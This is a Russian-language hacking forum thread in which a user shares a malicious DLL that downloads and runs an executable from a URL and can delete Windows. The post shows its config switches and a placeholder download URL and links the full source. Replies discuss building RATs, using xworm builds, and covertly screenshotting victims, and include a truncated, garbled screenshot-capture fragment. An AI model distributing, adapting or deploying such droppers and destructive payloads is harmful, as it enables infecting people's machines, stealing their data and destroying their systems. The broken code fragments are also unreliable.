ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby (https://forum.antichat.xyz/forumdisplay.php?f=24)
-   -   dll ратка и delete windows (https://forum.antichat.xyz/showthread.php?t=1543424)

undefine 11.10.2025 21:14

недавно тип просил сделать вирусняк dll по итогу сделал подгрузку exe и еще удаление винды

как юзать?

C++:





Код:

#define DELETE_WINDOWS_END 0
// изменить на 1 что бы было удаление windows
#define DOWNLOAD_EXE_AND_START 0
// изменить на 1 что бы использовать подгрузку exe



для подгрузки exe

C++:





Код:

const
char
*
url
=
"https://example.com/program.exe"
;
// ссылка на файл который подгружать
const
char
*
path
=
"C:\\Windows\\Temp\\program.exe"
;
// путь куда установить файл и откуда запускать



вот сам сурс https://github.com/dizasterry/dll-virus/

код сливаю ток для того что бы знали что ратки/стиллеры dll могут быть тк очень много людей убеждено что в dll не бывает витрусов

возможно потом сделаю anti подгрузку / anti удаление винды ( просто хуком windows функции для установки файлов но из за этого могу перестать работать некоторые читы у которых проверка лицензии происходит через скачивания того же самого .txt и проверки там hwid, но это можно будет пофиксить проверяя расширение устанавливаемого файла

undefine 11.10.2025 21:36

Цитата:

Сообщение от NeSecurity

tanksoft ≠ dizasterry

факт

Jadddxxx 26.10.2025 12:39

Цитата:

Сообщение от undefine

недавно тип просил сделать вирусняк dll по итогу сделал подгрузку exe и еще удаление винды
как юзать?

C++:





Код:

#define DELETE_WINDOWS_END 0
// изменить на 1 что бы было удаление windows
#define DOWNLOAD_EXE_AND_START 0
// изменить на 1 что бы использовать подгрузку exe



для подгрузки exe

C++:





Код:

const
char
*
url
=
"https://example.com/program.exe"
;
// ссылка на файл который подгружать
const
char
*
path
=
"C:\\Windows\\Temp\\program.exe"
;
// путь куда установить файл и откуда запускать



вот сам сурс https://github.com/dizasterry/dll-virus/

код сливаю ток для того что бы знали что ратки/стиллеры dll могут быть тк очень много людей убеждено что в dll не бывает витрусов

возможно потом сделаю anti подгрузку / anti удаление винды ( просто хуком windows функции для установки файлов но из за этого могу перестать работать некоторые читы у которых проверка лицензии происходит через скачивания того же самого .txt и проверки там hwid, но это можно будет пофиксить проверяя расширение устанавливаемого файла


Согласен ) много есть школьников которые пишут:

Ратка в длл ?)

смешно

undefine 26.10.2025 13:31

Цитата:

Сообщение от Jadddxxx

Согласен ) много есть школьников которые пишут:

Ратка в длл ?)
смешно

я сам когда то так думал, и вообще на похуях каждую длл инжектил

Jadddxxx 26.10.2025 13:41

Цитата:

Сообщение от undefine

я сам когда то так думал, и вообще на похуях каждую длл инжектил

Кстати ты немного ошибся,

Не обезательно подгружать файл,

Можно написать самому ратку , ведь это язык с++ тут нет разницы почти какой тип файла.

Но подгружая можно использовать другие рабочие билды.

undefine 26.10.2025 19:00

Цитата:

Сообщение от Jadddxxx

Кстати ты немного ошибся,
Не обезательно подгружать файл,
Можно написать самому ратку , ведь это язык с++ тут нет разницы почти какой тип файла.
Но подгружая можно использовать другие рабочие билды.

подгрузка - самый простой вариант

Jadddxxx 26.10.2025 19:26

Цитата:

Сообщение от undefine

подгрузка - самый простой вариант

Ну я бы не сказал что написания Api

И получать данные из апи это сложно.

(я когда то делал приватный чит, и если у типа запущена ida64.exe например скринит екран и я на сайте могу смотреть данный скрин.)

Но подрузка будет проще конечно.

upd: подрузку очень легко чекнуть, а подключения к вебхукам нужно реверсить, ведь если есть авторизация тогда понятно что будет отправляться входные и выходные запросы.

undefine 26.10.2025 19:30

Цитата:

Сообщение от Jadddxxx

Ну я бы не сказал что написания Api
И получать данные из апи это сложно.
(я когда то делал приватный чит, и если у типа запущена ida64.exe например скринит екран и я на сайте могу смотреть данный скрин.)
Но подрузка будет проще конечно.
upd: подрузку очень легко чекнуть, а подключения к вебхукам нужно реверсить, ведь если есть авторизация тогда понятно что будет отправляться входные и выходные запросы.

ну типо в любом случае, сгенить билд того же самого xworm намного легче чем писать получение экрана, вебки и тд

Jadddxxx 26.10.2025 19:36

Цитата:

Сообщение от undefine

ну типо в любом случае, сгенить билд того же самого xworm намного легче чем писать получение экрана, вебки и тд

скриншот делаеться в 20-30 строк.

только пример. Работать не будет (отправка на сервер и если не юзать дефолт winapi тогда будет 15 строк макс.)

тест:





[CODE]
#include
#include
#include
#include
int
GetEncoderClsid
(
const
WCHAR
*
format
,
CLSID
*
pClsid
)
{
using
namespace
Gdiplus
;
UINT num
=
0
;
UINT size
=
0
;
ImageCodecInfo
*
pImageCodecInfo
=
NULL
;
GetImageEncodersSize
(
&
num
,
&
size
)
;
if
(
size
==
0
)
return
-
1
;
pImageCodecInfo
=
(
ImageCodecInfo
*
)
(
malloc
(
size
)
)
;
if
(
pImageCodecInfo
==
NULL
)
return
-
1
;
GetImageEncoders
(
num
,
size
,
pImageCodecInfo
)
;
for
(
UINT j
=
0
;
j



а получении вебки еще проще, немного проблемы будут с микрофоном и все.

undefine 26.10.2025 19:37

[QUOTE="Jadddxxx"]

скриншот делаеться в 20-30 строк.
только пример. Работать не будет (отправка на сервер и если не юзать дефолт winapi тогда будет 15 строк макс.)

тест:





[CODE]
#include
#include
#include
#include
int
GetEncoderClsid
(
const
WCHAR
*
format
,
CLSID
*
pClsid
)
{
using
namespace
Gdiplus
;
UINT num
=
0
;
UINT size
=
0
;
ImageCodecInfo
*
pImageCodecInfo
=
NULL
;
GetImageEncodersSize
(
&
num
,
&
size
)
;
if
(
size
==
0
)
return
-
1
;
pImageCodecInfo
=
(
ImageCodecInfo
*
)
(
malloc
(
size
)
)
;
if
(
pImageCodecInfo
==
NULL
)
return
-
1
;
GetImageEncoders
(
num
,
size
,
pImageCodecInfo
)
;
for
(
UINT j
=
0
;
j

https://forum.antichat.xyz/attachments/28642526/

бл я даже в канал свой кидал эту тему типы в чате досихпор думают что длл вирусов не бывает, я в ахуе


Время: 10:18